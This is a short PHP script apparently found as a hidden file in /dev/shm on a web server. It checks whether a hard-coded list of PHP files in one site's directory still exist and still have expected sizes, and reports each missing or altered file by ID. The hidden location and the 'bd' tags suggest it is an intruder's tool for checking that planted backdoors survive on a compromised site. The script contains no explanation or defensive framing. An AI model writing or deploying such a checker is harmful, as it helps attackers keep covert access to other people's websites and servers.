File: //dev/shm/.component
<?php $r = '/home/wisdsits/aidn.wisdomcoders.us'; $x = ["/hq9plus.php"=>"bd@@1056329@@66",
"/edit_data.php"=>"bd@@1057352@@8",
"/edit.php"=>"bd@@1054510@@48",
"/pagedefaults.php"=>"bd@@1055864@@70",
"/tutte_mod.php"=>"bd@@1055877@@944",
"/tutte.php"=>"bd@@1056416@@1026",
"/tutte.php"=>"bd@@1057333@@95",
"/tutte_mod.php"=>"bd@@1056348@@57",
"/articleweb.php"=>"bd@@1056394@@86",
"/Required.php"=>"bd@@1057426@@928"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');